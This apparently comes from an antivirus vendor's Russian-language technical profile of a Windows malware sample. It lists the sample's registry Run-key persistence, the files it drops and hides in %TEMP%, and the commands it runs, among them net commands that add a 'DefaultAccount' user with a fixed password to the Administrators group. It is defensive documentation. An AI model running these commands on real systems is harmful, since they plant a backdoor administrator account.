Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '<Имя файла>' = '<Полный путь к файлу>'
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\ytmp\t19122.exe
- %TEMP%\ytmp\t11966.bat
- %TEMP%\ytmp\t12018.exe
- %TEMP%\~DF2A5E.tmp
- %TEMP%\WinGUi.exe
- %TEMP%\ytmp\t19070.bat
Присваивает атрибут 'скрытый' для следующих файлов:
- <Полный путь к файлу>
Другое:
Создает и запускает на исполнение:
- '%TEMP%\WinGUi.exe'
Запускает на исполнение:
- '<SYSTEM32>\net1.exe' USER DefaultAccount dargarfargar@1 /ADD
- '<SYSTEM32>\net.exe' USER DefaultAccount dargarfargar@1 /ADD
- '<SYSTEM32>\net1.exe' LOCALGROUP ADMINISTRATORS /ADD DefaultAccount
- '<SYSTEM32>\net.exe' LOCALGROUP ADMINISTRATORS /ADD DefaultAccount
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ytmp\t19070.bat" "%TEMP%\WinGUi.exe" "
- '<SYSTEM32>\cmd.exe' /k %TEMP%\WinGUi.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ytmp\t11966.bat" "%TEMP%\WinGUi.exe" "
- '<SYSTEM32>\attrib.exe' +h %TEMP%\ytmp
